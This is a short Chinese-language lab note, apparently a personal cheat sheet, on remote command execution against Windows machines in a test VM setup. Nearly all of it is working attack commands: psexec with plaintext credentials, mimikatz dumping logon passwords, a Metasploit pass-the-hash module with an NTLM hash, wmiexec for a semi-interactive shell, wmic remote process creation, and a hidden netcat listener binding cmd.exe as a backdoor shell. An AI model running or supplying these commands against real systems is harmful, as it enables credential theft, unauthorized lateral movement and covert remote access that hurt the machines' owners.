环境:Win10、Win7虚拟机
Windows远程命令执行
1、psexec.exe远程执行命令
psexec \\192.168.30.128 -u Administrator -p 123456789 cmd.exe
这里一开始登陆的是另一个管理员账号,但是一直被拒绝访问,后来把Administrator账号取消隐藏,一下就连接上。之后看到一篇文章也有一样的情况,只有Administrator账号才能连接,就算是管理员用户组的其他用户也不能连接,UAC的问题。
2、使用Hash登陆Windows
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"
或者使用wce抓取hash值:
msf调用payload:
-
use exploit/windows/smb/psexec -
show -
set RHOST 192.168.30.128 -
Set SMBPass 0182BD0BD4444BF867CD839BF040D93B:C22B315C040AE6E0EFEE3518D830362B -
set -
show -
Run
3、利用wmiexec工具配合进行反弹半交互shell
cscript.exe //nologo wmiexec.vbs /shell 192.168.30.128 Administrator 123456789
还可以单条命令执行
4、WMI执行命令方式,无回显
wmic /node:192.168.30.128 /user:Administrator /password:123456789 process call create "cmd.exe /c ipconfig>c:\result.txt"
执行成功后可以在被控制的机器里面找到执行结果的文件
5、nc远程执行
先在被控机器上开启监听,-L:让监听者在连接多次掉线时仍坚持监听,-d:让nc隐藏运行,-e:指定要运行的程序,-p:监听的端口
nc.exe -L -d -e cmd.exe -p 5555
控制端运行nc64.exe 192.168.30.128 5555
